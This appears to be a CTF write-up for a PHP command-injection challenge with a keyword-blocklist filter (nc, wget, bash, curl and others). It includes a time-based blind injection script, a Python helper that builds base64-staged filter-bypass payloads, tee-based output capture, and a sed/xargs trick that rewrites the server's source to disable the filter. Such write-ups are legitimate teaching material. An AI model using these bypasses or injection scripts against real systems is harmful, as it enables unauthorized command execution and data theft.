Source
<?php
error_reporting(0);
function check($x){
if(preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $x)){
die('too young too simple sometimes naive!');
}
}
if(isset($_GET['c'])){
$c=$_GET['c'];
check($c);
exec($c);
}
else{
highlight_file(__FILE__);
}
?>
Approach
At first I noticed that '' and "" are not filtered, so they can be used to break up the blocked keywords. Since there is no output, bash time-based blind injection works:
payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i,char)
There is also exfiltration with curl; what I used was echo xxx | bas''e64 -d | ba''sh
but the command would not execute; could someone more experienced explain why?
tee can also be used to create files.
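Added example, not part of the original writeup: a Python replica of the challenge's check() regex (the pattern and keyword list are copied from the source above; the function names, the base64 wrapper and the padding trick are my own). It lets you test a payload against the filter before sending it. Running the exfiltration wrapper from the approach above through it shows that ba''sh still contains the contiguous two-letter token sh, which is in the filter, whereas bas''h does not; it also shows that a base64 blob can itself contain a filtered letter pair (nc, sh, cp, mv, ...), so the helper prepends spaces to the inner command until an encoding passes. Note as well that the source filters the literal string pingtouch, so ping and touch on their own go through.

```python
import base64
import re

# Replica of the challenge's check() regex. In the PHP source the pattern sits in
# single quotes, so '\\$' reaches PCRE as '\$' (a literal dollar sign); the rest of
# the escaped punctuation and the keyword list are copied verbatim, including the
# 'pingtouch' token (so 'ping' and 'touch' alone are NOT filtered). /i -> IGNORECASE.
CHECK_RE = re.compile(
    r"\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<"
    r"|nc|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python"
    r"|pingtouch|mv|mkdir|cp",
    re.IGNORECASE,
)


def blocked_tokens(cmd):
    """Every substring of cmd that check() would match; an empty list means it passes."""
    return CHECK_RE.findall(cmd)


def is_blocked(cmd):
    """True if check() would die() on this command before exec() ever runs it."""
    return CHECK_RE.search(cmd) is not None


def stage_via_base64(inner_cmd, max_pad=48):
    """Wrap inner_cmd as  echo <b64> | bas''e64 -d | bas''h  so that filtered words
    (curl, base64, ...) only appear inside the blob. The empty quotes split the
    keywords for the regex; the shell removes them before execution. The blob itself
    can contain filtered letter pairs, so leading spaces (ignored by the shell) are
    prepended to inner_cmd until an encoding that passes the filter is found."""
    last_tokens = []
    for pad in range(max_pad):
        blob = base64.b64encode((" " * pad + inner_cmd).encode()).decode()
        wrapper = "echo %s | bas''e64 -d | bas''h" % blob
        last_tokens = blocked_tokens(wrapper)
        if not last_tokens:
            return wrapper
    raise ValueError("no clean encoding found; last tokens: %r" % last_tokens)


def unwrap_stage(wrapper):
    """Decode the blob of a wrapper built above; returns the command the shell would run."""
    blob = wrapper.split()[1]
    return base64.b64decode(blob).decode().lstrip(" ")


if __name__ == "__main__":
    # Constructed sample commands: the page's own payload fragments plus a few probes.
    for cmd in ["ls | tee 1", "ba''sh", "bas''h", "touch x", "cat /flag.php"]:
        print("%-16s -> %s" % (cmd, blocked_tokens(cmd) or "passes"))
    print(stage_via_base64("cat /f149_15_h3r3"))
```

The replica only tells you whether check() dies; whether the staged command then does anything useful still depends on the target (exec() discards output, so a staged curl or tee is what actually gets the data out).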
Solutions
Method 1
I tweaked Y1ng's script a little:
#!/usr/bin/env python3
#-*- coding:utf-8 -*-
#__author__: 颖奇L'Amore www.gem-love.com
import requests
import time as t
from urllib.parse import quote as urlen

url = 'http://85abd7bc-8396-47d1-81d7-a10e92331e33.challenge.ctf.show/?c='
# Characters tried at each position. '{', '}', '.' and '@' are rejected by the
# filter (the request dies at once, so they never cause a delay); the braces of
# ctfshow{...} therefore have to be filled in by hand.
alphabet = ['{','}', '.','/','@','-','_','=','a','b','c','d','e','f','j','h','i','g','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7','8','9']
result = ''
for i in range(1, 100):
    for char in alphabet:
        # Time-based blind: if character i of the first line equals char, sleep 5 s.
        # First run: list / to find the flag file name.
        # payload = "if [ ` ls / | awk 'NR==4' |cut -c{}` = '{}' ];then sleep 5;fi".format(i, char)
        payload = "if [ `cat /f149_15_h3r3 | awk 'NR==1' |cut -c{}` = '{}' ];then sleep 5;fi".format(i, char)
        try:
            start = t.time()
            r = requests.get(url + urlen(payload))  # percent-encode spaces, |, ` and ;
            elapsed = t.time() - start
            # Threshold sits between normal latency and the 5 s sleep.
            if elapsed >= 3:
                result += char
                print("Flag: " + result)
                break
        except Exception as e:
            print(e)
The stray . in the middle was probably caused by one request taking too long to respond during the blind injection.
Flag format: ctfshow{8-4-4-4-12}
Method 2
Use tee to write the output of ls (and then of the flag file) into a file in the script's working directory, then read those files back over HTTP:
?c=ls | tee 1
?c=cat /f149_15_h3r3 | tee 2
Method 3
But when I saw the group owner's solution I was stunned: you can even rewrite the source itself. Impressive.
sed -i 's/book/books/g' file   replaces book with books
xargs turns data from a pipe or standard input (stdin) into command-line arguments; it can also take its input from a file.
find . -name '*.xml' | xargs sed -i 's/hello/world/g'
Reference: https://blog.csdn.net/weixin_39731083/article/details/82495950
I tested it myself (hands-on practice):
xargs sed can also be used to modify files in bulk:
ls | xargs sed -i "s/die/echo/"
replaces die with echo, so check() now just prints the message and returns instead of terminating the script (note that this pipeline rewrites every file ls lists in the working directory)
ls | xargs sed -i "s/exec/system/"
replaces exec with system, so the command output is printed back in the response
After that anything goes, since the filter can no longer stop a request; even the filtered * now gets through:
?c=tac /f*
Summary
Y1ng is the GOAT.